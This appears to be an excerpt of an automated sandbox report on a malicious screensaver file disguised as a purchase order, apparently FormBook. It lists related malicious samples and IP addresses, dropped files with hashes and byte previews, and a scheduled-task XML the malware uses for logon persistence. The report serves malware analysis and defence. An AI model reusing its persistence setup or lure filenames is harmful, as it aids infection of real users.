                                                                                            • 146.88.233.115
                                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 146.88.233.115
                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 146.88.233.115
                                                                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 146.88.233.115
                                                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                                                            • 146.88.233.115
                                                                                            https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                            • 146.88.234.239
                                                                                            LINODE-APLinodeLLCUSOutstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 178.79.184.196
                                                                                            rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 212.71.233.17
                                                                                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                            • 178.79.182.90
                                                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                            • 50.116.24.57
                                                                                            BlOgLNwCom.exeGet hashmaliciousXenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            i586.elfGet hashmaliciousUnknownBrowse
                                                                                            • 172.104.31.172
                                                                                            AS6xKJzYJT.exeGet hashmaliciousPython Stealer, XenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            1OaTX8zI4B.exeGet hashmaliciousXenoRATBrowse
                                                                                            • 96.126.118.61
                                                                                            yliGAnBiRb.exeGet hashmaliciousUnknownBrowse
                                                                                            • 96.126.118.61
                                                                                            5Xt3byH0Pj.exeGet hashmaliciousXenoRATBrowse
                                                                                            • 96.126.118.61

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.dllBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                                                                                                  5890796959.xlsGet hashmaliciousFormBookBrowse
                                                                                                    PI_order_No202307110.docGet hashmaliciousFormBookBrowse
                                                                                                      ,2,3,4,5.xlsGet hashmaliciousFormBookBrowse
                                                                                                        DBK_+_RODTEP-checking_List.xlsGet hashmaliciousFormBookBrowse
                                                                                                          mv Dragonball.xlsxGet hashmaliciousFormBookBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Preview:@...e...........................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3270000[1].zip

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                            Category:dropped
                                                                                                            Size (bytes):480281
                                                                                                            Entropy (8bit):7.998782566236935
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:12288:Ksi/2nEints+5aKe3l6U67lCctqaihd3lnWt/RUNaprnP+vfkD:Kj/3Ka+5He3l6U6JCE43lWt+N2P+vsD
                                                                                                            MD5:2555518E014ABDA6AB2156ACEAA4C25C
                                                                                                            SHA1:DBFA5BE3E5AB5705BEA72C62591D1856A69E99A5
                                                                                                            SHA-256:81F30FFED254F6660EDA1845240DA62F1A73E94DBAE6DDB564F982825C7E99FE
                                                                                                            SHA-512:6984F9BFF3FACF693DCF4D22883E402EBFE673305AB0395EA52881109EA2B467B7D61567E3E8A0CA7FF01A3969FB8E0E384790333C7F5807EAD1EF190623C6AC
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........HN....(...........sqlite3.defUT....i\\.i\\ux................r.6...y...O_ .f..z.P..."..x.~..?..Hnz..A$A......~.....KI./..w...0-F{..CM..o&|...F?.,..pN...]Z....;...!p..[..pV&.:...=y....Y.g..[@.N..89...x..O.%J..L..o.3x8X..x...=k.~.*4'|.5...n..4.<8..e.pdN.X.kK......(..t.zU...zy........g...;.zQ l.&.....I..U`.....4...S.y.....xg....y@.../f.6...)..WX.......+x..*{.x..82ql..r...D...+.f..&.a.'......~...F.)..z.....Mp,..S...0..&w*F..u..R5.x.L..}...7*..Y.......~..f..a......+&...&.oR...........).........H..I.^s]3Z.8....w.a,.8/|.Y..MX.#.....1`.......5_..].....H....ke..X.p......JK"5....N.+,.........)d.Q.j..g.c.........~....``.Y..Y(4o1....{...H._..z...../.........R.y....5WY.....^....L.U...I.(S...J...I...:......_..v"E.J.qZ..VeG]..gj.H.X...{..aZ......:.T...#.$..H.qh.JE..@IN...i.[8her....|i..9...IDel..%..94.*....L..I.....,I.:.....!...h.^...g....R<.*.4..u.*o.L>.EG{..z..$PX........Y.BX..L...__{.6#@..o)....N... .]..>.......i..5._.F..K...>....G....K....

                                                                                                            C:\Users\user\AppData\Local\Temp\00255Of2

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                            Category:dropped
                                                                                                            Size (bytes):77824
                                                                                                            Entropy (8bit):1.133993246026424
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\5nyywgdq.nmp.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\5vgvg11d.qlv.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\gzkbfl5i.z03.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\h5qgooo5.zya.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\jz-tmbi.zip

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                            Category:dropped
                                                                                                            Size (bytes):480281
                                                                                                            Entropy (8bit):7.998782566236935
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:12288:Ksi/2nEints+5aKe3l6U67lCctqaihd3lnWt/RUNaprnP+vfkD:Kj/3Ka+5He3l6U6JCE43lWt+N2P+vsD
                                                                                                            MD5:2555518E014ABDA6AB2156ACEAA4C25C
                                                                                                            SHA1:DBFA5BE3E5AB5705BEA72C62591D1856A69E99A5
                                                                                                            SHA-256:81F30FFED254F6660EDA1845240DA62F1A73E94DBAE6DDB564F982825C7E99FE
                                                                                                            SHA-512:6984F9BFF3FACF693DCF4D22883E402EBFE673305AB0395EA52881109EA2B467B7D61567E3E8A0CA7FF01A3969FB8E0E384790333C7F5807EAD1EF190623C6AC
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........HN....(...........sqlite3.defUT....i\\.i\\ux................r.6...y...O_ .f..z.P..."..x.~..?..Hnz..A$A......~.....KI./..w...0-F{..CM..o&|...F?.,..pN...]Z....;...!p..[..pV&.:...=y....Y.g..[@.N..89...x..O.%J..L..o.3x8X..x...=k.~.*4'|.5...n..4.<8..e.pdN.X.kK......(..t.zU...zy........g...;.zQ l.&.....I..U`.....4...S.y.....xg....y@.../f.6...)..WX.......+x..*{.x..82ql..r...D...+.f..&.a.'......~...F.)..z.....Mp,..S...0..&w*F..u..R5.x.L..}...7*..Y.......~..f..a......+&...&.oR...........).........H..I.^s]3Z.8....w.a,.8/|.Y..MX.#.....1`.......5_..].....H....ke..X.p......JK"5....N.+,.........)d.Q.j..g.c.........~....``.Y..Y(4o1....{...H._..z...../.........R.y....5WY.....^....L.U...I.(S...J...I...:......_..v"E.J.qZ..VeG]..gj.H.X...{..aZ......:.T...#.$..H.qh.JE..@IN...i.[8her....|i..9...IDel..%..94.*....L..I.....,I.:.....!...h.^...g....R<.*.4..u.*o.L>.EG{..z..$PX........Y.BX..L...__{.6#@..o)....N... .]..>.......i..5._.F..K...>....G....K....

                                                                                                            C:\Users\user\AppData\Local\Temp\mmchndsb.hgb.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\pqr2bt54.yu5.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):5537
                                                                                                            Entropy (8bit):4.352267516149359
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++BwIMtvrENw+Y0aR:E/Q+7Ogn0RKOBF+++HvrENw+cR
                                                                                                            MD5:E8FDCAF1419C66D9916AD24D2FD671EE
                                                                                                            SHA1:E82EFDBB5561810E9EBBF80185642821F1B9D17E
                                                                                                            SHA-256:CB18BFE294499FEA8EE847148DD497DD20A05B3181E6B6AE8651B24B3D29391B
                                                                                                            SHA-512:B66EC534893F19152945BE4F717C2BD0542D88F43C57398CA5B61C74978A8FBB38A8E7144D104E5B254B50E1BCC9F158CA183A1D472708DA1A4AA356DEA9569F
                                                                                                            Malicious:false
                                                                                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):916693
                                                                                                            Entropy (8bit):6.515298049291402
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:uY80dlS9SDd59YfRAbaJJs1E8NIGG6lmd//V:uY8iSa2RAbaJJsO8NIGGoG
                                                                                                            MD5:1EB6ACF76A15B74B38333AF47DC1218D
                                                                                                            SHA1:A3FBC817F59B6A8899DC338CC15A75CDD17DFFF1
                                                                                                            SHA-256:A5EF3A78EB333B0E6DCA194EA711DCBB036119A788ECFE125F05176FB0FB70A3
                                                                                                            SHA-512:717931AA928DE150ABBB70D523C7DBD472BFA6C511AB55E0B50DF8D9661D33635156ED7B750285FA383CDD4064F225EA022F0BEAD3E066EE2BEBA84EF5731C15
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: BILL OF LADDING.exe, Detection: malicious, Browse
                                                                                                            • Filename: PO#86637.exe, Detection: malicious, Browse
                                                                                                            • Filename: PO AFHOR9301604.exe, Detection: malicious, Browse
                                                                                                            • Filename: 5890796959.xls, Detection: malicious, Browse
                                                                                                            • Filename: PI_order_No202307110.doc, Detection: malicious, Browse
                                                                                                            • Filename: ,2,3,4,5.xls, Detection: malicious, Browse
                                                                                                            • Filename: DBK_+_RODTEP-checking_List.xls, Detection: malicious, Browse
                                                                                                            • Filename: mv Dragonball.xlsx, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i\\...........!.....Z...................p.....a................................Q/........ .......................... ......H.... .......................0...3...................................................................................text....X.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

                                                                                                            C:\Users\user\AppData\Local\Temp\tmp61C0.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:modified
                                                                                                            Size (bytes):1574
                                                                                                            Entropy (8bit):5.103162941344142
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtyMxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                                            MD5:EC55073DC549118EB16DDA29B1167B10
                                                                                                            SHA1:3FC157556C89218660E90B3855DC7D57BE2159A7
                                                                                                            SHA-256:4E47B2EFA9489766775B7EAFABC6F9BF199861656DD4522937D457BA354F67FD
                                                                                                            SHA-512:223BE1461FB0BDA9318ED811B46DC8B0B12ED00F221193C7458DD95D2BC795CF8702B52CA750B366012F54C375A163A593B5816DEA4A82DAFB463032B1F5FA53
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                            C:\Users\user\AppData\Local\Temp\tmp958C.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1574
                                                                                                            Entropy (8bit):5.103162941344142
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtyMxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                                            MD5:EC55073DC549118EB16DDA29B1167B10
                                                                                                            SHA1:3FC157556C89218660E90B3855DC7D57BE2159A7
                                                                                                            SHA-256:4E47B2EFA9489766775B7EAFABC6F9BF199861656DD4522937D457BA354F67FD
                                                                                                            SHA-512:223BE1461FB0BDA9318ED811B46DC8B0B12ED00F221193C7458DD95D2BC795CF8702B52CA750B366012F54C375A163A593B5816DEA4A82DAFB463032B1F5FA53
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                            C:\Users\user\AppData\Local\Temp\vweah0oa.r0a.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Local\Temp\x1ikawk4.fmg.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1

                                                                                                            C:\Users\user\AppData\Roaming\PEJmengI.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):878088
                                                                                                            Entropy (8bit):7.714415066572313
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:tjlIhSPd+ppZbvbe3w/IWZin88Dckr0hD:tjl+SPspnzOUaQM0hD
                                                                                                            MD5:BC03B7D0CC3FAA356F5C49609D150B44
                                                                                                            SHA1:687546140C750B9B466F8DA86C63CFF613B727A2
                                                                                                            SHA-256:36389326C697D43ECF27B181B4EC997FFC45AA8B1CDCA0CCA34DB3D43075CCCD
                                                                                                            SHA-512:53E3C8DDA203BC230E3386222AC6904AACE2526082CD0279301C4BFE953D93FE94D9E2D0C4E8596EB26815CB9642E9A9EC53A1FA63CCF7267B00A93B8998FC7F
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......&.......&... ...@....@.. ....................................@..................................&..O....@..("...........0...6........................................................... ............... ..H............text........ ...................... ..`.rsrc...("...@...$..................@..@.reloc..............................@..B.................&......H.......d1...!...........S..x............................................0...........(........}.....s....}.....r...p(....}.....~.... ....s....}.....{....o.... ......o......{.....o......{....o.....{....o......{.....{....o.....*f........s ...s!...("....*~..{....r...po......{....o#....*.0..}.........{....r9..po......+7...{.....|....o$...}....(%....{....o&.....{.....o........+.&..{....rS..po........&..{....rS..po........*...........>P..........>f.........}.....('.......s....}....

                                                                                                            C:\Users\user\AppData\Roaming\PEJmengI.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.714415066572313
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:RFQ_P.O.1212024.scr
                                                                                                            File size:878'088 bytes
                                                                                                            MD5:bc03b7d0cc3faa356f5c49609d150b44
                                                                                                            SHA1:687546140c750b9b466f8da86c63cff613b727a2
                                                                                                            SHA256:36389326c697d43ecf27b181b4ec997ffc45aa8b1cdca0cca34db3d43075cccd
                                                                                                            SHA512:53e3c8dda203bc230e3386222ac6904aace2526082cd0279301c4bfe953d93fe94d9e2d0c4e8596eb26815cb9642e9a9ec53a1fa63ccf7267b00a93b8998fc7f
                                                                                                            SSDEEP:24576:tjlIhSPd+ppZbvbe3w/IWZin88Dckr0hD:tjl+SPspnzOUaQM0hD
